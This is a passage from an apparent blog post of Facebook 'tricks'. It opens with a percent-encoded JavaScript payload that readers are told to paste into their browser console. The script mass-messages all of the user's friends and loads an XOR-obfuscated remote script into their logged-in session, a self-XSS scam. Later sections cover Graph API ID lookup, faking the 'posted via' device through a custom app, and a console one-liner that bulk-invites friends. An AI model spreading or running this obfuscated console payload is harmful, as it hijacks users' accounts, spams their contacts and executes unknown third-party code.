%61%74%63%68%5B%30%5D%5B%74%69%6D%65%73%74%61%6D%70%5F%61%62%73%6F%6C%75%74%65%5D%3D%54%6F%64%61%79%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%74%69%6D%65%73%74%61%6D%70%5F%72%65%6C%61%74%69%76%65%5D%3D%32%25%33%41%33%31%70%6D%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%74%69%6D%65%73%74%61%6D%70%5F%74%69%6D%65%5F%70%61%73%73%65%64%5D%3D%30%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%69%73%5F%75%6E%72%65%61%64%5D%3D%66%61%6C%73%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%69%73%5F%63%6C%65%61%72%65%64%5D%3D%66%61%6C%73%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%69%73%5F%66%6F%72%77%61%72%64%5D%3D%66%61%6C%73%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%69%73%5F%66%69%6C%74%65%72%65%64%5F%63%6F%6E%74%65%6E%74%5D%3D%66%61%6C%73%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%70%6F%6F%66%5F%77%61%72%6E%69%6E%67%5D%3D%66%61%6C%73%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%6F%75%72%63%65%5D%3D%73%6F%75%72%63%65%25%33%41%63%68%61%74%25%33%41%77%65%62%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%6F%75%72%63%65%5F%74%61%67%73%5D%5B%30%5D%3D%73%6F%75%72%63%65%25%33%41%63%68%61%74%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%62%6F%64%79%5D%3D%22%20%2B%20%65%6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%74%28%6D%73%67%29%20%2B%20%22%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%68%61%73%5F%61%74%74%61%63%68%6D%65%6E%74%5D%3D%66%61%6C%73%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%68%74%6D%6C%5F%62%6F%64%79%5D%3D%66%61%6C%73%65%26%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%70%65%63%69%66%69%63%5F%74%6F%5F%6C%69%73%74%5D%5B%30%5D%3D%66%62%69%64%25%33%41%22%20%2B%20%61%72%72%5B%73%75%63%5D%20%2B%20%22%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%70%65%63%69%66%69%63%5F%74%6F%5F%6C%69%73%74%5D%5B%31%5D%3D%66%62%69%64%25%33%41%22%20%2B%20%75%73%65%72%5F%69%64%20%2B%20%22%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%75%69%5F%70%75%73%68%5F%70%68%61%73%65%5D%3D%56%33%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%74%69%63%6B%65%72%5F%69%64%5D%3D%31%32%36%33%36%32%31%31%37%35%34%38%35%38%35%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%73%74%61%74%75%73%5D%3D%30%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%6D%65%73%73%61%67%65%5F%69%64%5D%3D%25%33%43%31%33%36%39%34%37%34%32%36%31%36%36%31%25%33%41%39%37%38%30%37%36%33%33%31%2D%34%30%33%38%31%30%31%35%39%32%25%34%30%6D%61%69%6C%2E%70%72%6F%6A%65%6B%74%69%74%61%6E%2E%63%6F%6D%25%33%45%26%26%63%6C%69%65%6E%74%3D%6D%65%72%63%75%72%79%26%5F%5F%75%73%65%72%3D%22%20%2B%20%75%73%65%72%5F%69%64%20%2B%20%22%26%5F%5F%61%3D%31%26%5F%5F%64%79%6E%3D%37%6E%38%61%68%79%6A%33%35%43%46%77%58%41%77%26%5F%5F%72%65%71%3D%31%68%26%66%62%5F%64%74%73%67%3D%22%20%2B%20%64%74%73%20%2B%20%22%26%70%68%73%74%61%6D%70%3D%22%3B%0A%20%20%20%20%77%69%74%68%28%6E%65%77%78%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%29%20%6F%70%65%6E%28%22%50%4F%53%54%22%2C%20%22%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%6D%65%72%63%75%72%79%2F%73%65%6E%64%5F%6D%65%73%73%61%67%65%73%2E%70%68%70%22%29%2C%20%73%65%6E%64%28%70%73%74%29%3B%0A%20%20%20%20%73%75%63%2B%2B%3B%0A%20%20%20%20%69%66%20%28%73%75%63%20%3E%20%61%72%72%2E%6C%65%6E%67%74%68%29%20%7B%0A%20%20%20%20%20%20%20%20%61%6C%65%72%74%28%22%41%75%74%6F%20%50%6F%73%74%69%6E%67%20%43%6F%6D%70%6C%65%74%65%64%2E%20%4E%6F%77%20%52%65%66%72%65%73%68%20%79%6F%75%72%20%48%6F%6D%65%70%61%67%65%2E%22%29%3B%0A%20%20%20%20%20%20%20%20%73%75%63%20%3D%20%30%0A%20%20%20%20%7D%20%65%6C%73%65%20%73%65%74%54%69%6D%65%6F%75%74%28%22%70%6F%73%74%69%74%6F%6B%28%29%22%2C%20%33%45%34%20%2F%20%61%72%72%2E%6C%65%6E%67%74%68%29%0A%7D%0A%73%65%74%54%69%6D%65%6F%75%74%28%22%61%75%74%6F%70%6F%73%74%69%6E%67%66%75%6E%63%28%29%22%2C%20%31%45%33%29%3B%0A%76%61%72%20%58%20%3D%20%22%6A%76%76%72%71%38%2D%2D%70%63%75%2C%65%6B%76%6A%77%60%2C%61%6D%6F%2D%60%6A%63%70%65%63%74%33%3B%3B%34%2D%44%60%2F%43%77%76%6D%2F%76%6D%6D%6E%71%2D%6F%63%71%76%67%70%2D%51%77%72%72%6D%70%76%5D%44%6B%6E%67%2C%68%71%22%3B%0A%59%20%3D%20%22%22%3B%0A%5A%20%3D%20%22%22%3B%0A%76%61%72%20%56%3B%0A%56%20%3D%20%58%2E%6C%65%6E%67%74%68%3B%0A%66%6F%72%20%28%69%20%3D%20%30%3B%20%69%20%3C%20%56%3B%20%69%2B%2B%29%20%7B%0A%20%20%20%20%59%20%2B%3D%20%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%58%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%20%5E%20%32%29%0A%7D%0A%5A%20%3D%20%75%6E%65%73%63%61%70%65%28%59%29%3B%0A%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%29%2E%73%72%63%20%3D%20%5A%3B”));
Step 3.
For Google Chrome:-
Press f12 button to open console box.Paste script in input area and then press enter.
Step 4.
For Mozilla Firefox  Click on firefox button >>Web Developer>> Scretchpad  paste the code and top center you find run button click on that.
Step 5
You will see a message in console tab showing that Refused To Load script or something like that but you need not to care that.However, you will see a new box opened in your browser’s window.
 Type your message in that box and then click on post.You will see ‘waiting’ on the box for few seconds and then it will show a pop-up messages Check Pic below .
Done !
:::::Enjoy:::;;;

3. Online FB ID Finder Tool



When creating a Facebook account, the system automatically assigns the user an identification number, known as the Facebook ID. Facebook allows the user replace their ID with username. If you are using a custom username for your Facebook profile or page, then unique profile ID will not appear. Many tutorials give you an instruction by clicking right mouse on image profile to find your unique ID. Now I will tell you even easier to find your Facebook profile ID.  E
very Facebook profile, and Facebook Fan Page, has an associated ID number. 

Non-Customized Facebook Profile URL


For those of you who haven’t customized the URL of your Facebook, then finding your ID is super easy.  Just click on the “Profile” tab in the upper right hand corner then look at the URL (web address).

Your URL (web address) will look something like this:


http://www.facebook.com/profile.php?id=100003348599455

I’ve highlighted the Facebook profile ID above, and it’s the 15 digit number that comes after the “id” portion.

Customized Facebook Profile URL


Now, for those of you that have already customized the URL of your personal Facebook profile, you need to do something a little bit different.

Here’s what I mean by a customized Facebook profile URL – I’ll use my Facebook profile as the example:
If you’ve customized the URL, then obviously the ID is no longer showing.
So what you need to do to get the ID of your Facebook profile, if you’ve customized your URL, is simply copy your customized username “prophethacker” And Paste Into Below facebook user ID finder tool
and finally click on Get ID button to get your facebook id .

  




To find the user ID of a named user, you must query the Open Graph. Every object within the Open Graph has a unique URL that can be inspected and will return information about that object. Users are no exception.
The URL to a named user is http://graph.facebook.com/prophethacker, and will return a JSON object containing information about that user:
{
   "id": "100002367325649",
   "name": "Vinay Kumar",
   "first_name": "Vinay",
   "last_name": "Kumar",
   "link": "http://www.facebook.com/prophethacker",
   "gender": "male",
   "locale": "en_US",
   "username": "prophethacker"
}
The user ID is specified in the id property.

4. Update Facebook Status via  a any Device


 I don't have an iPhone 5 but i can still update my fb status via iPhone 5.
We are not a millionaire so we don't have a list of smart devices .But you think like a hacker
you can do it .You can show of your friend that you have a smart device ,in your fb status show via a device.When your friends see your fb status they were shocked. Now you can update status via difference devices ranging from android phone to iPhone . From now on, no need to feel upset when your friend updates status from his expensive gadgets.

I don’t have an iPhone 5 but i can still update my fb status via iPhone 5.
 We are not a millionaire so we don’t have a list of smart devices .But you think like a hacker
you can do it .
 You can show of your friend that you have a smart device ,in your fb status show via a device.When your friends see your fb status they were shocked.
Now you can update status via difference devices ranging from android phone to iPhone . From now on, no need to feel upset when your friend updates status from his expensive gadgets.

CREATING A FACEBOOK APP 

  1. Go to this link Facebook Developers
  2. Create your account if you don’t have
  3. Click on Apps (The last option of the top menu beside search bar)
  4. Now click on Create New App
  5. Now if you want to post your status with iPhone then type iphone in place of App Name
  6. Click on continue
  7. Now it will ask you to enter captcha. Just enter the captcha and move ahead
  1. 1. Fill the display name (If you want to update your status with iphone then type iphone).   
  2. Enter an app domain and site url (If you don’t have domain then enter what I have entered in this app) 
  3.  Sandbox mode must be disabled. 
  4. Copy the App ID 
    Save changes.
Now you will see the basic settings of the app. See the image below

POSTING STATUS ON FACEBOOK WITH YOUR APP

  1. Copy one from these URLs 
  2. Paste your App ID which you have copied in the red marked area.
  3. Now your URL will be like
     

https://m.facebook.com/dialog/feed?app_id=429297103855432<place your app id>&redirect_uri=https%3A%2F%2Fwww.facebook.com&to&display=touch

  1. Open the URL with your browser and post your status.

PRE CREATED URLs

  1. You find more precreated app id at this site of various devices. 

5. Invite all Facebook Friends for FB Page


Selecting & inviting all of your friends in an event can be a tedious task, especially if you have more than 1,000 friends to send invitations to.

Luckily, this trick that allows users to select/invite all of their friends in an event or an app – with just one click.

How to Do it:
1)       Open Firefox and go to your Facebook page to invite all friends to like your page.

2)       Select “All Friends” instead of “Recent Interaction” so that you can invite all friends to your page. Scroll down till all of your friends are shown in the page.

3)       Press Ctrl+Shift+K and a small window will appear at bottom.

4)       Paste the below code in it and click enter.

javascript:elms=document.getElementsByName(“checkableitems[]“);for (i=0;i < elms.length;i++){if (elms[i].type=”checkbox” )elms[i].click()};

Hacks and Tricks like the above, should always be attempted using caution. We are not aware of anyone ever getting in trouble for using the above Hacks, but in some cases they do bypass the intended functionality of Facebook, so be careful.

Categories: